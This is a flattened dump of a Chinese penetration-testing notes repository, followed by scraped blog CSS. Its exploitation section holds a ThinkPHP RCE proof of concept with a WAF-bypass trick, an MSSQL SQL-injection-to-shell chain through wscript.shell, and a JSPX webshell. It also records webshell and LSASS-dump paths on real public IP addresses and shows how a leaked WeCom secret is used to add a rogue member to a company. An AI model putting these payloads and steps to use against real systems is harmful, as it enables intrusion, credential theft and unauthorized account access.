https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/04-漏洞利用/ThinkPHP文件写入WAF绕过/04.png -------------------------------------------------------------------------------- /04-漏洞利用/ThinkPHP文件写入WAF绕过/05.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/04-漏洞利用/ThinkPHP文件写入WAF绕过/05.png -------------------------------------------------------------------------------- /04-漏洞利用/ThinkPHP文件写入WAF绕过/ThinkPHP文件写入WAF绕过.md: -------------------------------------------------------------------------------- 1 | 分享一个ThinkPHP GetShell时WAF绕过的小技巧 2 | 3 | # POC 4 | 以如下POC为例 5 | ``` 6 | POST /?s=captcha&test=-1 HTTP/1.1 7 | Host: 127.0.0.1 8 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36 9 | Content-Type: application/x-www-form-urlencoded 10 | 11 | s=file_put_contents('system.php','')&_method=__construct&method=POST&filter[]=assert 21 | ``` 22 | 23 | # 原理 24 | ![image](./01.png) 25 | 官方文档中提到,使用base64_decode解码但不指定第二个参数$strict时,base64字符集以外的字符将被忽略,由此我们可以利用它来插入大量垃圾字符 26 | 27 | # 实践 28 | Ubuntu22.04 + 宝塔(Nginx1.24.0 + PHP5.6.40) 29 | 30 | 先测试合法base64字符,代码如下 31 | ``` 32 | 36 | ``` 37 | 访问后,输出如下图 38 | ![image](./02.png) 39 | 40 | 测试插入非法base64字符 41 | ``` 42 | 46 | ``` 47 | 访问后,输出如下图 48 | ![image](./03.png) 49 | 50 | 测试插入100万个非法base64字符,python脚本如下 51 | ``` 52 | with open("a.txt", "w") as fw: 53 | for i in range(1000000): 54 | fw.write("*") 55 | ``` 56 | 代码如下 57 | ![image](./04.png) 58 | 访问后,输出如下图 59 | ![image](./05.png) -------------------------------------------------------------------------------- /04-漏洞利用/WebLogic写入WebShell路径记录.md: -------------------------------------------------------------------------------- 1 | ``` 2 | D:/OracleWeblogic12/Middleware/Oracle_Home/wlserver/server/lib/consoleapp/webapp/images/ 3 | http://182.131.125.206:8005/console/images/aaccvv1.jsp 4 | 5 | D:/weblogic/user_projects/domains/YNYDYXPri/servers/Server-0/tmp/_WL_internal/bea_wls_internal/o6fxc0/war/DumpHash.exe-lsass.dmp 6 | http://218.89.146.78:7011/bea_wls_internal/DumpHash.exe-lsass.dmp 7 | 8 | D:/weblogic/user_projects/domains/YNYDYXPri/servers/Server-0/tmp/_WL_internal/bea_wls_internal/o6fxc0/war/ 9 | http://218.89.146.78:7011/bea_wls_internal/acc 10 | ``` -------------------------------------------------------------------------------- /04-漏洞利用/XXL-JOB渗透简单记录.md: -------------------------------------------------------------------------------- 1 | 同事已经打完,给了我一个截图,我去验证一遍 2 | 3 | admin 123456进入后台 4 | 照着网上的教程尝试反弹Shell发现没反应,进一步查阅资料得知,目标服务器可能不出网,针对不出网情况,可通过日志查看结果,于是执行whoami等命令并通过调度日志查看执行结果,可怎么也验证不成功,一直如下错误: 5 | 6 | Cannot run program "bash": CreateProcess error=2, 系统找不到指定的文件。 7 | 8 | 可同事给我的截图分明是linux系统啊 9 | 10 | 抱着试试看的态度,选择了powershell,竟然成功了,还真是一切皆有可能,猜测后端是集群,有的executor是linux,有的executor是windows 11 | 12 | 参考文章: 13 | https://mp.weixin.qq.com/s/t0aDztXr9KNwop_Je5ot4Q 14 | https://mp.weixin.qq.com/s/vUr4kLQ88coHxxLbb-ZwxA 15 | https://mp.weixin.qq.com/s/AKufROJaT6DLDqyykslrAg -------------------------------------------------------------------------------- /04-漏洞利用/Yapi代码执行WAF绕过.md: -------------------------------------------------------------------------------- 1 | 参考文章:https://mp.weixin.qq.com/s/yQ-s1w9yDCWEKTQE57NP6w 2 | 3 | 文章核心内容:用spawnSync替代被WAF拦截的execSync -------------------------------------------------------------------------------- /04-漏洞利用/YonYou NC路径记录.md: -------------------------------------------------------------------------------- 1 | ``` 2 | 命令执行目录:E:\IBM\WebSphere\AppServer\profiles\App65 3 | 4 | Web目录:dir ..\\..\\..\\..\\..\\nc65home\\webapps\\nc_web 5 | 6 | e:\nc65home\webapps\nc_web 7 | ``` -------------------------------------------------------------------------------- /04-漏洞利用/基于楔形文字的XSS WAF绕过/pic/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/04-漏洞利用/基于楔形文字的XSS WAF绕过/pic/0.png -------------------------------------------------------------------------------- /04-漏洞利用/基于楔形文字的XSS WAF绕过/pic/readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /04-漏洞利用/基于楔形文字的XSS WAF绕过/readme.md: -------------------------------------------------------------------------------- 1 | 可绕过基于关键字“alert”的检测 2 | 3 | 创建一个文件xss.html,内容如下 4 | ``` 5 | 6 | 7 | 13 | 14 | 15 | ``` 16 | 效果如下图 17 | ![image](./pic/0.png) 18 | -------------------------------------------------------------------------------- /04-漏洞利用/明源云.md: -------------------------------------------------------------------------------- 1 | SQL注入GetShell 2 | ``` 3 | EXEC sp_configure 'show advanced options', 1; 4 | RECONFIGURE WITH OVERRIDE; 5 | EXEC sp_configure 'Ole Automation Procedures', 1; 6 | RECONFIGURE WITH OVERRIDE; 7 | declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c cmd' 8 | ``` -------------------------------------------------------------------------------- /04-漏洞利用/极端环境下linux文件下载.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/04-漏洞利用/极端环境下linux文件下载.pdf -------------------------------------------------------------------------------- /04-漏洞利用/符合JSPX的WebShell.md: -------------------------------------------------------------------------------- 1 | ``` 2 | 3 | 4 | 5 | 6 | 7 | "); 18 | brs = br.readLine(); 19 | } 20 | }catch(Exception ex){ 21 | out.println(ex.toString()); 22 | } 23 | }]]> 24 | 25 | 26 | 27 | ``` -------------------------------------------------------------------------------- /04-漏洞利用/通用WAF绕过/image/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/04-漏洞利用/通用WAF绕过/image/01.png -------------------------------------------------------------------------------- /04-漏洞利用/通用WAF绕过/image/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/04-漏洞利用/通用WAF绕过/image/02.png -------------------------------------------------------------------------------- /04-漏洞利用/通用WAF绕过/image/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/04-漏洞利用/通用WAF绕过/image/03.png -------------------------------------------------------------------------------- /04-漏洞利用/通用WAF绕过/image/04.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/04-漏洞利用/通用WAF绕过/image/04.png -------------------------------------------------------------------------------- /04-漏洞利用/通用WAF绕过/image/05.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/04-漏洞利用/通用WAF绕过/image/05.png -------------------------------------------------------------------------------- /04-漏洞利用/通用WAF绕过/image/06.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/04-漏洞利用/通用WAF绕过/image/06.png -------------------------------------------------------------------------------- /04-漏洞利用/通用WAF绕过/readme.md: -------------------------------------------------------------------------------- 1 | waf绕过的根本原理,就是对payload进行各种变形处理,同时不影响payload的正常执行,实际测试下来,发现有一点玄学,总之就是各种方式的组合 2 | 3 | ### 思路1 修改请求方法 4 | 可将请求方法从GET改为POST或其他非正常请求方法,如DDD、XXX 5 | 6 | ### 思路2 添加多个反斜杠 7 | 实际需要添加多少反斜杠需要自己测试,借用abc123师傅的图 8 | ![image](./image/01.png) 9 | 10 | ### 思路3 添加无用的GET请求参数 11 | 例如添加username=xxxxx或者password=sdfewfwfeewffew等等,借用abc123师傅的图 12 | ![image](./image/02.png) 13 | 14 | ### 思路4 URL编码混淆掺杂 15 | 对部分url请求头进行url编码,一小段一小段地进行URL编码绕waf效果更好,借用abc123师傅的图 16 | ![image](./image/03.png) 17 | 18 | ### 思路5 请求包XML标签内掺杂脏数据 19 | 对于漏洞2019-2725,可以在请求数据包中添加脏数据,例如可以在``标签中间添加脏数据,由于是POST请求数据包,这里面可以添加很长很长的脏数据,借用abc123师傅的图 20 | ![image](./image/04.png) 21 | 22 | ### 思路6 请求包头部添加脏数据 23 | 对于漏洞2019-2725,有的waf设备可能检测了以` 5 | 6 | 7 | ``` 8 | ### 2、利用过程 9 | 1、传入获取到的id和secrect到如下的API地址,可获取AccessToken 10 | ``` 11 | https://qyapi.weixin.qq.com/cgi-bin/gettoken?corpid=id&corpsecret=secrect 12 | ``` 13 | 2、企微中会分为一个个的部分,通过企微的API我们可以获取到企业的架构和部门ID,这个在添加成员的时候用的到,在如下API中查询ak权限,就能查询到部门名称以及部门ID 14 | ``` 15 | https://open.work.weixin.qq.com/devtool/query?e=301002 16 | ``` 17 | 3、向如下API 18 | ``` 19 | https://qyapi.weixin.qq.com/cgi-bin/user/create?access_token=ACCESS_TOKEN 20 | ``` 21 | 传入如下信息 22 | ``` 23 | { 24 | "userid": "zhangsan", 25 | "name": "张三", 26 | "department": [6], 27 | "mobile":"1388888888" 28 | } 29 | ``` 30 | 调用成功后,即可通过手机号登录目标企业的企业微信。 31 | ### 3、参考连接 32 | https://mp.weixin.qq.com/s/LMZVcZk7_1r_kOKRau5tAg 33 | https://qydev.weixin.qq.com/wiki/index.php?title=%E7%AE%A1%E7%90%86%E6%88%90%E5%91%98#.E6.9B.B4.E6.96.B0.E6.88.90.E5.91.98 34 | -------------------------------------------------------------------------------- /06-移动端/华为nova2下无需root安装Metasploit/readme.md: -------------------------------------------------------------------------------- 1 | 华为nova2下安装google play store失败 2 | 从http://www.apkmirror.com/中下载termux 3 | 通过数据线传到手机上并安装 4 | 5 | 进入termux后执行如下指令: 6 | pkg install curl 7 | curl -OL https://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/metasploit.sh 8 | chmod +x metasploit.sh 9 | ls -alh 10 | ./metasploit.sh 11 | After few minutes it will ask “Do you want to continue? [y/n] → Press y 12 | 13 | 但是执行完报错如下: 14 | [*] Metasploit requires the Bundler gem to be installed 15 | $ gem install bundler 16 | 17 | 解决方式是执行如下指令: 18 | gem install bundler 19 | bundle install 20 | 21 | 还是报错如下: 22 | 缺少Gemfile.local(好像是,记不清了) 23 | 24 | 解决方式是执行如下指令: 25 | apt update 26 | apt -y upgrade 27 | apt -y install git ruby ruby-dev make clang autoconf curl wget ncurses-utils libsqlite-dev postgresql postgresql-dev libpcap-dev libffi-dev libxslt-dev pkg-config 28 | git clone -b termux https://github.com/timwr/metasploit-framework.git 29 | cd metasploit-framework 30 | gem install bundler 31 | gem install nokogiri -- --using-system-libraries 32 | bundle install --gemfile Gemfile.local 33 | ./msfconsole 34 | 35 | 还是报错如下: 36 | can't find gem bundler ( >= 0.a) with executable bundle 37 | 38 | 解决方式是执行如下指令: 39 | gem install bundler -v 1.15.1 40 | 41 | 参考链接: 42 | https://techglimpse.com/metasploit-error-gem-bundler-solution/ 43 | https://lucideustech.blogspot.com/2018/02/attacking-windows-platform-with.html?m=1 44 | https://github.com/rapid7/metasploit-framework/issues/8765 45 | https://stackoverflow.com/questions/47026174/find-spec-for-exe-cant-find-gem-bundler-0-a-gemgemnotfoundexception 46 | -------------------------------------------------------------------------------- /06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/1552062-20190930181009614-220891246.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/1552062-20190930181009614-220891246.png -------------------------------------------------------------------------------- /06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/1552062-20190930181050174-353852155.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/1552062-20190930181050174-353852155.png -------------------------------------------------------------------------------- /06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/1552062-20190930181532435-1354612174.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/1552062-20190930181532435-1354612174.png -------------------------------------------------------------------------------- /06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/1552062-20190930182341419-19222429.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/1552062-20190930182341419-19222429.png -------------------------------------------------------------------------------- /06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/1552062-20190930182426538-1131763727.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/1552062-20190930182426538-1131763727.png -------------------------------------------------------------------------------- /06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/1552062-20190930182446648-387901848.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/1552062-20190930182446648-387901848.png -------------------------------------------------------------------------------- /06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/1552062-20190930182502806-1217416539.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/1552062-20190930182502806-1217416539.png -------------------------------------------------------------------------------- /06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/1552062-20190930182611435-303381481.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/1552062-20190930182611435-303381481.png -------------------------------------------------------------------------------- /06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/1552062-20190930182806545-1489946553.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/1552062-20190930182806545-1489946553.png -------------------------------------------------------------------------------- /06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/1552062-20190930183017302-889351796.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/1552062-20190930183017302-889351796.png -------------------------------------------------------------------------------- /06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/1552062-20190930183037804-1109993841.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/1552062-20190930183037804-1109993841.png -------------------------------------------------------------------------------- /06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/1552062-20190930183156784-996670706.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/1552062-20190930183156784-996670706.png -------------------------------------------------------------------------------- /06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/1552062-20190930183223310-1710195029.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/1552062-20190930183223310-1710195029.png -------------------------------------------------------------------------------- /06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/1552062-20190930183239042-1593406928.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/1552062-20190930183239042-1593406928.png -------------------------------------------------------------------------------- /06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/1552062-20190930183245631-1543983740.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/1552062-20190930183245631-1543983740.png -------------------------------------------------------------------------------- /06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/1552062-20190930183651765-1989380630.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/1552062-20190930183651765-1989380630.png -------------------------------------------------------------------------------- /06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/20160415120337.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/20160415120337.png -------------------------------------------------------------------------------- /06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/aframe.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | -------------------------------------------------------------------------------- /06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/avatar-default.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/bundle-darkgreentrip-mobile.min.css: -------------------------------------------------------------------------------- 1 | body{font-size:14px !important;-webkit-text-size-adjust:none}.skin-codinglife .bannerbar-mobile{margin-bottom:-10px}#bannerbar img{width:100% !important;max-width:100% !important;max-height:70px}.formobile{display:block}.forpc{display:none !important}#blog_nav_rss{display:none !important}#blog_nav_rss_image{display:none !important}#blog_nav_newpost{display:none !important}.cnblogs-post-body img,.blog_comment_body img{max-width:300px !important;height:auto}div.commentform textarea{min-height:200px}.commentbox_title{width:auto}#green_channel{width:100%}#cnblogs_post_body table[style]{width:auto !important;height:auto !important}#sidebar_search_box input[type=text]{width:260px}#cnblogs_post_body table{display:block;overflow-x:scroll;-webkit-overflow-scrolling:regular;max-height:800px}#cnblogs_post_body table::-webkit-scrollbar:horizontal{height:12px}#cnblogs_post_body table::-webkit-scrollbar-track{-webkit-box-shadow:inset 0 0 6px rgba(0,0,0,.3);border-radius:10px;background-color:#f5f5f5}#cnblogs_post_body table::-webkit-scrollbar{width:12px;background-color:#f5f5f5}#cnblogs_post_body table::-webkit-scrollbar-thumb{border-radius:10px;-webkit-box-shadow:inset 0 0 6px rgba(0,0,0,.3);background-color:#555}#cnblogs_c1,#cnblogs_c2{text-align:center;margin:10px auto 0 auto}#cnblogs_c1{width:300px}#cnblogs_c2 img{max-width:100%;height:auto}.commentform{margin-left:10px}.commentbox_tab{width:100%}.comment_textarea{width:100%}div.commentform textarea{font-size:16px}.commentbox_title_right,.commentbox_title_left{width:100%;max-width:100%;justify-content:space-between}.commentbox_title_right{padding:8px 5px}.navbar{display:none}#main{min-width:auto !important;padding-left:0 !important;width:auto !important;padding-right:5px}#navigator{width:auto !important}#sideBar{width:auto !important}#mainContent{margin-left:0 !important;float:none !important}#mainContent .forFlow{margin-left:5px !important}#comment_form{padding-left:10px !important}#blogTitle h1{width:auto !important}#home{width:auto} -------------------------------------------------------------------------------- /06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/bundle-darkgreentrip.min.css: -------------------------------------------------------------------------------- 1 | #EntryTag{margin-top:20px;font-size:9pt;color:#808080}.topicListFooter{text-align:right;margin-right:10px;margin-top:10px}#divRefreshComments{text-align:right;margin-right:10px;margin-bottom:5px;font-size:9pt}*{margin:0;padding:0}html{height:100%}body{color:#000;background:#d2d8de;font-family:'PingFang SC','Microsoft YaHei','Helvetica Neue','Helvetica','Arial',sans-serif;font-size:14px;min-height:101%}table{border-collapse:collapse;border-spacing:0}fieldset,img{border:0}ul{word-break:break-all}li{list-style:none}h1,h2,h3,h4,h5,h6{font-size:100%;font-weight:normal}a:link{color:#000;text-decoration:none}a:visited{color:#000;text-decoration:none}a:hover{color:#f60;text-decoration:underline}a:active{color:#000;text-decoration:none}.clear{clear:both}#home{margin:0 auto}.navbar{padding-top:3px;padding-bottom:3px;border-bottom:1px dotted #eee;padding-left:12px;padding-right:12px}.navbar>nav .navbar-branding img{max-height:26px;height:26px}.navbar>nav .navbar-search{height:30px}#blogTitle{height:80px;background:#fff;clear:both}#blogTitle h1{font-size:150%;font-weight:bold;line-height:1.5;margin-left:1em;margin-top:10px;width:50%;float:left}#blogTitle h2{margin-left:4em;line-height:1.5;width:50%;float:left}#blogLogo{float:right}#navigator{background-color:#000;height:50px;line-height:50px;overflow:hidden;clear:both}#navList{min-height:30px;float:left}#navList li{float:left}#navList a{display:block;padding:0 1.5em;height:60px;font-family:'微软雅黑';float:left;font-size:1.2em;text-align:center;transition-duration:.3s}#navList a:link,#navList a:visited,#navList a:active{color:#bbb}#navList a:hover{color:#fff;background-color:#343434;text-decoration:none;text-shadow:0 0 1px #000}#navList a.aHeaderXML{padding-top:25px;overflow:hidden}#navList a.aHeaderXML img{vertical-align:middle}.blogStats{float:right;color:#ccc;padding-right:10px;text-align:right}#main{min-width:950px;text-align:left;padding:20px 0 0 10px;overflow:hidden}#mainContent .forFlow{margin-left:21em;float:none;width:auto}#mainContent{min-height:200px;padding:0 0 10px 0;*padding-top:10px;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;word-break:break-all;float:right;margin-left:-21em;margin-right:20px;display:inline;width:100%}.day{min-height:10px;_height:10px;background:#fff;border-radius:7px;box-shadow:1px 1px 2px #a7a8ad;color:#666;margin:0 5px 20px 0;padding:5px 20px 10px}.dayTitle{width:100%;color:#666;line-height:2.2em;font-size:22px;clear:both;border-bottom:1px solid #ccc;text-align:center}.postTitle{font-size:110%;font-weight:bold;border-bottom:1px dashed #ccc;float:right;line-height:2.5em;font-size:18px;width:100%;clear:both}.postTitle a:link,.postTitle a:visited,.postTitle a:active{color:#390;transition:all .4s linear 0s}.postTitle a:hover{color:#f60;text-decoration:none;margin-left:10px}.postCon{float:right;line-height:1.5;width:100%;clear:both;padding:10px 0}.postDesc{float:right;width:100%;clear:both;text-align:right;padding-right:5px;color:#a8b1ba;line-height:2.5em}.postDesc a:link,.postDesc a:visited,.postDesc a:active{color:#666}.postDesc a:hover{color:#f60;text-decoration:none}.postSeparator{clear:both;height:1px;border-top:1px dotted #666;width:100%;clear:both;float:right;margin:0 auto 15px auto}#sideBar{width:250px;min-height:200px;padding:0 0 0 5px;float:left;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;word-break:break-all}.newsItem .catListTitle{display:none}.newsItem,#blog-calendar{margin-bottom:15px;text-indent:0;padding:10px;background:#fafcfd;border-radius:7px;box-shadow:1px 1px 2px #a7a8ad;line-height:1.5}#calendar{margin-bottom:15px;padding:5px;border-radius:7px;box-shadow:1px 1px 2px #a7a8ad;background:#fff}#calendar .Cal{width:100%;line-height:1.5}#calendar th{padding:2px 5px}#calendar td{padding:2px 5px}#calendar td a{display:block}.Cal{border:none;color:#666}#calendar table a:link,#calendar table a:visited,#calendar table a:active{font-weight:bold}#calendar table a:hover{color:#fff;text-decoration:none;background-color:#f60}.CalTodayDay{color:#f60}#calendar .CalNextPrev a:link,#calendar .CalNextPrev a:visited,#calendar .CalNextPrev a:active{font-weight:bold;background-color:#fff}.CalDayHeader{border-bottom:1px solid #ccc}.CalTitle{width:100%;background:#fff;color:#000;border-bottom:1px solid #666}.catListTitle{background:#390;border-bottom:1px solid #060;border-top-left-radius:7px;border-top-right-radius:7px;color:#fff;font-size:1.2em;height:1.8em;line-height:1.8em;padding:5px;text-indent:.5em;text-shadow:1px 1px 0 rgba(0,0,0,.3)}.catListComment{line-height:1.5}.divRecentComment{text-indent:2em;color:#666}#sideBarMain ul{line-height:1.5}#AjaxHolder_UpdatePanel1,#AjaxHolder_PostComment_divCommnentArea,#profile,.entrylist,.gallery{background:none repeat scroll 0 0 #fff;border-radius:7px;box-shadow:1px 1px 2px #a7a8ad;margin:0 0 15px 0;min-height:200px;overflow:hidden;padding:0 15px;text-overflow:ellipsis;word-break:break-all}#AjaxHolder_PostComment_divCommnentArea{padding:10px}#profile,.entrylist,.gallery{padding:10px}.catListEssay,.catListLink,.catListNoteBook,.catListTag,.catListPostCategory,.catListPostArchive,.catListImageCategory,.catListArticleArchive,.catListView,.catListFeedback,.mySearch,.catListComment,.catListBlogRank,.catList,.catListArticleCategory{margin-bottom:15px;background:#fafcfd;border-radius:7px;box-shadow:1px 1px 2px #a7a8ad;overflow:hidden;zoom:1}.catListEssay ul li,.catListLink ul li,.catListNoteBook ul li,.catListTag ul li,.catListPostCategory ul li,.catListPostArchive ul li,.catListImageCategory ul li,.catListArticleArchive ul li,.catListView ul li,.catListFeedback ul li,.catListComment ul li,.catListBlogRank ul li,.catList ul li,.catListArticleCategory ul li{text-indent:1em;padding:10px 5px;border-bottom:1px solid #dadfe1;border-top:1px solid #fff;overflow:hidden}.catListEssay ul li a,.catListLink ul li a,.catListNoteBook ul li a,.catListTag ul li a,.catListPostCategory ul li a,.catListPostArchive ul li a,.catListImageCategory ul li a,.catListArticleArchive ul li a,.catListView ul li a,.catListFeedback ul li a,.catListComment ul li a,.catListBlogRank ul li a,.catList ul li a .catListArticleCategory ul li a{text-indent:1em;font-size:12px}.catListEssay ul li a:hover,.catListLink ul li a:hover,.catListNoteBook ul li a:hover,.catListTag ul li a:hover,.catListPostCategory ul li a:hover,.catListPostArchive ul li a:hover,.catListImageCategory ul li a:hover,.catListView ul li a:hover,.catListFeedback ul li a:hover,.catListArticleArchive ul li a:hover,.catListComment ul li a:hover{text-decoration:none}.divRecentCommentAticle{padding:0 10px}.divRecentComment{padding:10px;font-size:12px}#AjaxHolder_PostComment_divCommnentArea td{padding:5px 0}#topics{min-height:200px;margin-bottom:15px;padding:15px;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;word-break:break-all;background:#fff;border-radius:7px;box-shadow:1px 1px 2px #a7a8ad}#topics .postTitle{font-size:130%;font-weight:bold;border-bottom:1px solid #999;float:left;line-height:2em;width:100%;padding-left:5px}.postBody{padding:15px 2px 5px 5px;line-height:1.5;color:#000;border-bottom:1px solid #ccc}#EntryTag{color:#666}#EntryTag a{margin-left:5px}#EntryTag a:link,#EntryTag a:visited,#EntryTag a:active{color:#666}#EntryTag a:hover{color:#f60}#topics .postDesc{float:right;width:100%;text-align:right;padding-right:5px;color:#666;margin-top:5px}.feedback_area_title{font-weight:bold;line-height:35px;margin:10px 0;border-bottom:1px solid #ccc;padding-left:8px}.louzhu{background:transparent url('images/icoLouZhu.gif') no-repeat scroll right top;padding-right:16px}.feedbackListSubtitle{color:#666}.feedbackListSubtitle a:link,.feedbackListSubtitle a:visited,.feedbackListSubtitle a:active{color:#666;font-weight:normal}.feedbackListSubtitle 